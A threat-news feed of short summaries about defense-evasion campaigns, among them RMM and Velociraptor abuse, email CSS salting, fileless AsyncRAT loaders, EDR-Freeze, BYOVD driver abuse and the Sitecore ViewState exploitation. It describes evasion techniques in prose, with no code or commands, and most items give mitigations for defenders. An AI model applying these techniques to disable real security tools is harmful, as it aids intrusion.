All news with #defense evasion tag

🔒 DarkAtlas researchers warn that APT groups are leveraging legitimate RMM platforms to gain initial access, increasingly favoring ScreenConnect as it evades basic detection. Attackers abuse features like unattended access, VPN, REST API and file transfer, deploy in-memory installers that leave little disk artefacts, and register persistent services such as ScreenConnect.WindowsClient.exe. Defenders should monitor invite links, config files, in-memory activity and specific event IDs for effective DFIR.

🔒 Threat actors are abusing Velociraptor, an open-source DFIR tool, to support ransomware operations attributed to Storm-2603. Attackers exploited on-premises SharePoint ToolShell flaws to deploy an outdated Velociraptor build (0.73.4.0) vulnerable to CVE-2025-6264, enabling privilege escalation and remote command execution. After lateral movement and creation of domain admin accounts, the group tampered with GPOs, disabled real‑time protection, and staged exfiltration before deploying Warlock, LockBit, and Babuk. Vendors caution that legitimate collection and orchestration capabilities can be repurposed by adversaries.

⚠️Researchers have observed threat actors leveraging the open-source DFIR tool Velociraptor to maintain persistent remote access and deploy ransomware families including LockBit and Babuk. Cisco Talos links the campaigns to a China-based group tracked as Storm-2603 and notes use of an outdated Velociraptor build vulnerable to CVE-2025-6264. Attackers synchronized local admin accounts to Entra ID, accessed vSphere consoles, disabled Defender via AD GPOs, and used fileless PowerShell encryptors with per-run AES keys and staged exfiltration prior to encryption.

🧯 Cisco Talos warns of extensive abuse of CSS to insert hidden “salt” — extraneous characters, comments and markup — into email preheaders, headers, attachments and bodies to evade detection. This hidden text salting technique is significantly more common in spam and malicious mail than in legitimate messages, undermining both signature and ML-based defenses. Talos advises detecting concealed content and, crucially, stripping or normalising that salt before passing messages to downstream engines, while also urging attention to longer-term strategic decision-making in cyber defense.

🧂 Cisco Talos documents growing abuse of CSS to insert visually hidden 'salt' into emails, a technique that undermines parsing and language-detection systems. Observed across preheaders, headers, attachments and bodies between March 1, 2024 and July 31, 2025, attackers use CSS properties (font-size, opacity, display, clipping) and zero-width characters to conceal irrelevant content. Talos recommends detection plus HTML sanitization and filters—examples include Cisco Secure Email Threat Defense—to strip or ignore invisible content before downstream analysis.

📎 BlackPoint researchers tracked a campaign that distributes credential-themed ZIP archives containing malicious Windows shortcut (.lnk) files. When opened, the shortcuts launch minimized, obfuscated PowerShell that downloads DLL payloads disguised as .ppt files, saves them to the user profile and invokes them via rundll32.exe. The dropper assembles commands from byte arrays, probes for antivirus processes and uses quiet flags to minimize visible indicators. Recommended mitigations include blocking LNKs in archives, enforcing Mark of the Web, denying execution from user-writable locations, and enabling PowerShell script block logging and AMSI.

🔒 LockBit 5.0 introduces faster ESXi drive encryption and enhanced evasion techniques, according to Trend Micro. The release includes Windows, Linux and VMware ESXi variants featuring heavy obfuscation, ETW patching, DLL reflection and hypervisor-targeted encryption designed to amplify impact. Researcher Jon DiMaggio describes the update as largely incremental fine-tuning and self-branding aimed at restoring affiliate trust after Operation Cronos.

🔍 Unit 42 uncovered Operation Rewrite, a March 2025 SEO poisoning campaign that deploys a native IIS implant called BadIIS to manipulate search engine indexing and redirect users to attacker-controlled scam sites. The implant registers request handlers, inspects User‑Agent and Referer headers, and proxies malicious content from remote C2 servers. Variants include lightweight ASP.NET page handlers, a managed .NET IIS module, and an all-in-one PHP front controller. Organizations can detect and block activity with Palo Alto Networks protections and should engage incident responders if compromised.

🔒 A new proof-of-concept named EDR-Freeze shows that Windows Error Reporting can be abused from user mode to suspend antivirus and EDR processes. The method leverages WerFaultSecure and the MiniDumpWriteDump API so the dumper pauses a target process and then the dumper itself is frozen, leaving the security agent inoperative without a kernel driver. Researcher TwoSevenOneThree validated the technique on Windows 11 24H2, describing it as a design weakness rather than a classic vulnerability, and defenders can monitor WER invocations or harden reporting components to mitigate the risk.

🛡️ Acronis researchers have uncovered a rare FileFix campaign that hides a second-stage PowerShell script and encrypted executables inside JPG images using steganography. Attackers employ multilingual, heavily minified phishing pages that mimic a Meta support flow and trick victims into pasting a payload into file upload address bars. An obfuscated PowerShell one-liner downloads images from Bitbucket, extracts and decrypts components, and executes a Go-based loader that deploys StealC. Organizations should combine user training with process blocking and monitoring to mitigate this evolving threat.

🔧 Microsoft has announced that the legacy WMIC command-line tool will be removed after systems are upgraded to Windows 11 25H2 and later. Administrators are advised to migrate scripts and automation to PowerShell or programmatic alternatives such as WMI's COM API or .NET libraries. The change affects only the WMIC client; the underlying WMI infrastructure remains supported. Microsoft says the removal reduces complexity and limits abuse of WMIC by threat actors.

🔒 HybridPetya is a newly identified UEFI bootkit that can bypass Secure Boot by exploiting CVE-2024-7344, enabling installation of malicious components into the EFI System Partition. ESET located a sample on VirusTotal and describes it as possibly a proof-of-concept, research project, or an early-stage criminal tool. The bootkit replaces the Windows bootloader, forces reboots to execute at startup, encrypts MFT clusters with Salsa20 while showing a fake CHKDSK, and then presents a ransom screen demanding a Bitcoin payment and a 32-character key to restore the bootloader and decrypt data.

🔍The Q2 2025 HP Wolf Threat Insights Report describes how threat actors are increasingly chaining living‑off‑the‑land (LOTL) tools and abusing uncommon file types to evade detection. Attackers hide final payloads inside images or use tiny SVGs that mimic legitimate interfaces, then execute code via native Windows processes like MSBuild. These methods leverage trusted sites and native binaries to bypass filters and complicate incident response.

🔍 Security researchers at LevelBlue Labs identified an open-source Remote Access Trojan, AsyncRAT, being deployed via a multi-stage, fileless in-memory loader that avoids writing executables to disk. Attackers gained initial access through a compromised ConnectWise ScreenConnect client, executing a VBScript which invoked PowerShell to fetch two staged .NET assemblies. The first-stage assembly decodes payloads into byte arrays and uses reflection to run the secondary assembly directly in memory, while operators disabled AMSI and tampered with ETW to evade runtime detection. Persistence was achieved with a scheduled task disguised as "Skype Update," and the RAT used an AES-256 encrypted configuration to connect to a DuckDNS-based C2.

🔍 Researchers uncovered a sophisticated fileless campaign that executes malicious code entirely in memory to deliver AsyncRAT. The attack began via a compromised ScreenConnect client and a VBScript that used WScript and PowerShell to download two payload blobs saved to C:\Users\Public\, which were never written as executables but loaded into memory via reflection. A .NET launcher (Obfuscator.dll) was used to orchestrate persistence, disable security logging and load the RAT, which exfiltrates credentials, browser artifacts and keystrokes.

🔒 Bitdefender tracked a Chinese APT intrusion that used a novel, fileless framework dubbed EggStreme to compromise a Philippines-based military contractor. The multi-stage toolkit injects code directly into memory, leverages DLL sideloading and abuses legitimate Windows services for persistence, and delivers a gRPC-enabled backdoor, EggStremeAgent, with extensive reconnaissance and exfiltration capabilities. Bitdefender advises limiting use of high-risk binaries and deploying advanced detection and response to detect living-off-the-land operations and anomalous behavior.

🛡️ Bitdefender attributed a campaign against a Philippines-based military contractor to a China-linked APT that deployed a previously undocumented fileless framework named EggStreme. The multi-stage operation begins with EggStremeFuel (mscorsvc.dll), which profiles systems, opens a C2 channel, stages loaders, and triggers in-memory execution of the core backdoor via DLL sideloading. EggStremeAgent functions as a central backdoor, injecting a session-specific keylogger (EggStremeKeylogger), communicating over gRPC, and exposing a 58-command toolkit for discovery, lateral movement, privilege escalation and data theft. An auxiliary implant, EggStremeWizard (xwizards.dll), provides reverse-shell access and resilient C2 options; Bitdefender warned that fileless execution and heavy DLL sideloading make detection and forensics difficult.

⚠️ Mandiant reports attackers are actively exploiting a leaked ASP.NET machineKey sample from old Sitecore deployment guides to carry out ViewState code-injection attacks that execute arbitrary .NET assemblies in server memory. The issue, tracked as CVE-2025-53690, affects multi-instance deployments of Sitecore XM, XP, and XC that used the static sample key, and may also impact some Sitecore Managed Cloud Standard container configurations. After initial access, adversaries deploy tools Mandiant calls WEEPSTEEL and EARTHWORM, escalate to SYSTEM, create administrative accounts, dump SYSTEM/SAM hives, and move laterally. Sitecore customers are advised to inspect environments for indicators of compromise, rotate and encrypt <machineKey> entries, and follow Microsoft ASP.NET ViewState guidance.

🔐 Barracuda researchers have detailed new link-obfuscation capabilities in the Tycoon Phishing-as-a-Service kit that hide malicious destinations from scanners and recipients. Observed techniques include URL encoding with '%20' invisible spaces, deceptive Unicode characters, hidden codes appended to links, redundant protocol prefixes, and subdomain manipulation. Attacks also incorporate a fake CAPTCHA stage and tools aimed at bypassing multi-factor authentication, enabling more effective email-based social engineering and evasion of traditional filters.

🚨 Check Point attributes a BYOVD campaign to the Silver Fox actor that leverages a Microsoft-signed WatchDog kernel driver (amsdk.sys v1.0.600) to neutralize endpoint defenses. The operation uses a dual-driver approach—an older Zemana-based driver on Windows 7 and the WatchDog driver on Windows 10/11—to terminate processes and escalate privileges. An all-in-one loader bundles anti-analysis checks, embedded drivers, AV-killer logic, and a ValleyRAT downloader to establish persistent remote access.